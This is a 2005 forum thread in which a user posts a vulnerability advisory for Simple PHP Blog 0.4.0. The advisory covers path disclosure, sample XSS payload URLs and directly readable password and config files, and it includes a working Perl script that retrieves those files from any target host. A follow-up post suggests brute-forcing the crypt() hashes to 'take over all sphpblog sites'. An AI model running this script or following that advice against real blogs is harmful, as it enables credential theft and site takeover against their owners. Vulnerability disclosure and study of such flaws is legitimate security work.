|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 169
Members: 0
Total: 169
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
[ECHO_ADV_12$2005] Vulnerabilities in sphpblog |
|
Posted: Thu Apr 14, 2005 4:06 am |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
ECHO_ADV_12$2005
---------------------------------------------------------------------------
Vulnerabilities in sphpblog
---------------------------------------------------------------------------
Author: y3dips
Date: April, 13th 2005
Location: Indonesia, Jakarta
Web: http://echo.or.id/adv/adv012-y3dips-2005.txt
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Simple PHP blog (sphpblog)
version: 0.4.0
lisensi: GPL - http://www.gnu.org/licenses/licenses.html#GPL
url : http://sourceforge.net/projects/sphpblog/
Author: Alexander Palmo (apalmo <at> bigevilbrain <dot> com)
Description: simple Blog without databases needed
---------------------------------------------------------------------------
Vulnerabilities:
~~~~~~~~~~~~~~~~
A. Full Path disclosures
http://[Url]/sphpblog/scripts/sb_functions.php
Ex :
Warning: main(scripts/sb_fileio.php): failed to open stream: No such file or directory in
/var/www/sphpblog/scripts/sb_functions.php on line 52
Fatal error: main(): Failed opening required 'scripts/sb_fileio.php'
(include_path='.:/usr/share/pear') in
/var/www/sphpblog/scripts/sb_functions.php on line 52
B. XSS in search.php
http://Url/sphpblog/search.php?q=[XSS]
http://[Url]/sphpblog/search.php?q=%3Cmarquee%3Ewe+are+a+like%3C%2Fmarquee%3E
http://[URl]/sphpblog/search.php?q=<a href=http://echo.or.id>echo</a>
C. Critical Information dislosures
Critical file (password and config file) are vulnerable to direct access
to view 'critical' information about the blog and the user.
Password file are using PHP`s crypt() function
http://[Url]/sphpblog/config/password.txt
http://[Url]/sphpblog/config/config.txt
---------------------------------------------------------------------------
Script:
~~~~~~~
#!/usr/bin/perl -w
# Remote grabbing sphpblog password & config file by y3dips
# Bug find by y3dips <http:// y3dips echo or id>
# Bug published at http://echo.or.id/adv/adv12-y3dips-2005.txt
print "\n* Remote grabbing sphpblog password & config file by y3dips *\n";
require LWP::UserAgent;
if(@ARGV == 1)
{
$target= $ARGV[0];
my $ua = LWP::UserAgent->new;
$ua->agent("MSIE/6.0 Windows");
$ua->timeout(10);
$ua->env_proxy;
my @url = ("http://$target/config/password.txt", " http://$target/config/config.txt");
foreach my $urlz (@url) {
my $injek = $ua->get($urlz);
print "\n-------------------------------\n";
if ($injek->is_success)
{ print $injek->content;}
else
{die $injek->status_line;}
print "\n-------------------------------\n";
}
}
else {
print "Use: perl $0 [www.target.com] \n";
}
# EOF y3dips(c)2005
# greetz :
# @echo|staff = qw/ m0by the_day z3r0byt3 comex k-159 c-a-s-e s`to lirva32 anonymous /;
# @waraxe.us = qw/ waraxe LINUX shai-tan all_guys /;
# @echo = qw/ newbie_hacker@yahoogroups.com #e-c-h-o_@_DALnet /;
---------------------------------------------------------------------------
Shoutz:
~~~~~~~
~ m0by, the_day, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32, anonymous
~ waraxe and all frineds at waraxe.us
~ newbie_hacker@yahoogroups.com ,
~ #e-c-h-o@DALNET
---------------------------------------------------------------------------
Contact:
~~~~~~~~
y3dips || echo|staff || y3dips[at]gmail[dot]com
Homepage: http://y3dips.echo.or.id/
-------------------------------- [ EOF ] ---------------------------------- |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
|
|
|
|
Posted: Thu Apr 14, 2005 12:20 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Nice advisory, mate! |
|
|
|
|
Posted: Thu Apr 14, 2005 2:46 pm |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
thx , bro , but there is one problem.
cracking the crypt() , you may do some brute forcing ..
just make some page with user n password (from wordlist) then u do some hash with crypt() then compare it (ive already asking about this)
after that u may Take over all sphpblog sites |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
Posted: Fri Apr 15, 2005 2:11 pm |
|
|
LINUX |
Moderator |
|
|
Joined: May 24, 2004 |
Posts: 404 |
Location: Caiman |
|
|
|
|
|
|
congratulations for you new advisorie good work |
|
|
|
|
www.waraxe.us Forum Index -> General discussion
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|